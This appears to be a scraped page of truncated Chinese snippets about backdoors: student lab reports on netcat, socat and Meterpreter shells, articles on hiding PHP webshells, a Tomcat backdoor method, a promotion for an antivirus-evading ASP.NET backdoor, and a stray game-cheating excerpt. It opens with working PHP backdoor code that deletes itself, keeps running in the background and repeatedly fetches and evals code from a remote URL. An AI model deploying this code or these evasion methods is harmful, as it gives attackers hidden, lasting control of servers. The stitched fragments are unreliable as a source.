<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep(5); }; ?> 后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百…
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,…
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或netcat获取远程主机的Shell 1.1 Windows获得Linux Shell 1.2 Linux获得Win Shell 1.3 Mac获取Win shell 1.4 Win获取Mac Shell 1.5 Mac获取Linux Shell 1.6 Linux获取Mac Shell 1.7 Netcat扩展知…
1.后门概念 后门就是不经过正常认证流程而访问系统的通道. 哪里有后门呢? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序. -- 下面是近些年的一些例子: 编译器:苹果Xcode后门事件.苹果Xcode后门事件中招的APP包括:微信.网易云音乐.滴滴出行.12306等76个软件,影响到几亿用户. 操作系统:政府VS厂商.苹果公开拒绝FBI要求设置后门的要求.那些没拒绝的当然不会说话. 操作系统:深入解读MS14-068漏洞…
这个玩意儿是很久之前的整的.一直没有做完,但是基本功能和框架都做好了,现在发出来,希望有能力的家伙一起完成.DLLspy,绝对免杀,隐藏,HTTP请求劫持,居家旅行,杀人放火必备良药.有时间我会继续开发的,有啥子问题可以直接联系我因为采用了html+js作为客户端,所以浏览器兼容的问题很让我蛋疼啊,现在只支持IE,火狐不行,其余不知道 原理:通过IHttpModule,相当于劫持了所有.aspx的请求(只要是经过.NET处理的都可以)特点:采用了多线程,采用直接调用系统API,绝对免杀,杀毒软件…
作者:Phithon 原文连接:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 最近很多人分享一些过狗过盾的一句话,但无非是用各种方法去构造一些动态函数,比如$_GET['func']($_REQUEST['pass'])之类的方法.万变不离其宗,但这种方法,虽然狗盾可能看不出来,但人肉眼其实很容易发现这类后门的. 那么,我就分享一下,一些不需要动态函数.不用eval.不含敏感函数.免杀免拦截的一句话. 0x00…
在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普. AD: 0×00前言 在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普. 以PHP-WEBBACKDOOR为例,抛砖引玉 一个最常见的一句话后门可能写作这样 <?php @eval($…
从本案例中可以学到: (1)关于JSP的一些基础知识 (2)利用Tomcat的用户名和密码来构建后门 本文首先要感谢<黑客手册>“非安全.后生”编辑为本为提供了帮助,还要感谢网友“伤心的鱼”,本文借鉴了“看小菜如何搞定tomcat”一文中的思路,该文中提供的war生成比较模糊,且操作复杂,本文提供的方法简单易行. JSP是Java Server Pages的缩写,是由Sun Microsystems公司倡导.许多公司参与一起建立的一种动态网页技术标准. JSP技术是用JAVA语言作为脚本语言的…
逆向实战干货,快速定位自动捡阳光Call,或者标志 注意: 关于CE和OD的使用,这里不再多说,快速定位,默认大家已经有了CE基础,或者OD基础. 第一种方法,找Call 第一步,打开CE,搜索阳光值 第二步,打开OD,数据窗口中搜索这个地址的数值(073B7C10) 注意,OD要先附加一下 F9 把游戏运行起来,我们数据窗口搜索这个地址的数值 然后找到地址 第三步,对其里面的值下内存写入断点 然后回到游戏,捡起一个阳光 内存断点断下来了,我们看下指令,发现 add函数,而且看下ECX的值 16…
后门的基本概念及基础问题 后门程序就是留在计算机系统中,供某位特殊使用者通过某种特殊方式控制计算机系统的途径. [1] 后门程序,跟我们通常所说的"木马"有联系也有区别.联系在于:都是隐藏在用户系统中向外发送信息,而且本身具有一定权限,以便远程机器对本机的控制.区别在于:木马是一个完整的软件,而后门则体积较小且功能都很单一.后门程序类似于特洛依木马(简称"木马"),其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作. 后门程序和电脑病毒最大的差别,在于后门程序…